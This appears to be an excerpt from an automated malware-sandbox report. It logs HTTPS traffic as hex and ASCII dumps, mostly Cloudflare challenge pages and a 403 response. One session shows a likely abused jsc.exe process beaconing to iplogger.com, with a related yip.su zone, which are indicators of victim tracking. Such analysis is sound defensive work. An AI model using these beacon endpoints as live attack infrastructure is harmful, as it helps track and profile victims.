                                    2024-08-17 22:10:07 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:07 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:07 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:07 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:07 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:07 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:07 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:07 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 31 30 37 39 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 30 63 39 63 30 39 38 63 30 35 27 2c 63 48 61 73 68 3a 20 27 39 37 37 36 34 61 33 37 31 39 37 34 36 30 38 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 55 35 73 4b 48 55 53 77 63 36 6a 69 71 31 31 6f 6a 69 6e 6a 64 4b 7a 74 69 64 55 54 7a 6e 4b 54 52 34 59 36 53 6c 62 4b 31 49 49 2d 31 37 32 33 39 33 32 36 30 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '91079',cRay: '8b4cfe0c9c098c05',cHash: '97764a371974608',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=U5sKHUSwc6jiq11ojinjdKztidUTznKTR4Y6SlbK1II-1723932607-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:07 UTC1369INData Raw: 49 31 38 31 53 77 51 52 2e 7a 5f 58 78 53 31 47 79 47 34 67 66 79 56 70 41 71 50 55 7a 53 75 78 51 38 69 59 65 39 65 6b 50 72 53 54 78 35 59 6b 6c 54 77 72 65 4c 46 5a 78 4e 50 5f 44 43 53 38 6b 52 74 73 6d 45 79 64 6f 4b 30 30 30 43 45 74 57 52 4b 62 79 59 68 31 4c 7a 56 61 77 5f 76 58 2e 53 38 73 53 39 39 68 62 6c 32 78 56 71 74 6f 55 43 44 54 64 32 32 44 6a 4e 42 76 6d 6c 51 68 2e 53 50 33 66 55 6d 5a 38 4d 4c 4a 58 43 48 50 51 73 42 57 73 68 48 4e 71 49 44 58 72 47 5a 55 4f 6c 41 43 4e 32 58 36 31 30 34 52 55 52 33 70 73 68 41 5f 43 31 79 33 6c 68 5a 65 4e 6a 5f 31 35 57 65 70 7a 6a 4a 56 34 45 59 61 31 35 41 30 4f 54 69 33 73 56 72 2e 2e 31 51 46 41 42 4c 72 2e 6a 36 55 59 6e 48 6d 57 70 63 6b 62 31 45 68 73 32 77 42 4e 71 47 4b 4d 71 53 37 68 69 64
                                    Data Ascii: I181SwQR.z_XxS1GyG4gfyVpAqPUzSuxQ8iYe9ekPrSTx5YklTwreLFZxNP_DCS8kRtsmEydoK000CEtWRKbyYh1LzVaw_vX.S8sS99hbl2xVqtoUCDTd22DjNBvmlQh.SP3fUmZ8MLJXCHPQsBWshHNqIDXrGZUOlACN2X6104RUR3pshA_C1y3lhZeNj_15WepzjJV4EYa15A0OTi3sVr..1QFABLr.j6UYnHmWpckb1Ehs2wBNqGKMqS7hid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.549769104.21.76.574437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:12 UTC68OUTGET /1djqU4 HTTP/1.1
                                    Host: iplogger.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:12 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:12 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 68 6a 54 68 37 70 61 4b 39 2f 67 6d 54 58 6f 78 78 2b 35 7a 73 79 73 68 62 4f 5a 44 53 55 6d 66 45 73 51 63 65 63 78 50 70 59 2f 56 66 34 30 41 6e 69 35 30 71 38 53 57 58 70 46 64 50 52 65 34 33 4e 4b 50 78 39 6a 49 6c 57 65 30 47 54 39 2b 50 45 73 48 7a 70 6c 74 56 38 6e 49 41 54 62 2b 46 68 73 51 33 7a 6e 50 41 6c 4d 3d 24 4f 77 45 4e 56 6b 61 72 46 65 35 69 79 6d 33 69 53 71 4f 59 68 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: hjTh7paK9/gmTXoxx+5zsyshbOZDSUmfEsQcecxPpY/Vf40Ani50q8SWXpFdPRe43NKPx9jIlWe0GT9+PEsHzpltV8nIATb+FhsQ3znPAlM=$OwENVkarFe5iym3iSqOYhw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:12 UTC1369INData Raw: 33 65 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e12<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:12 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:12 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:12 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:12 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:12 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:12 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
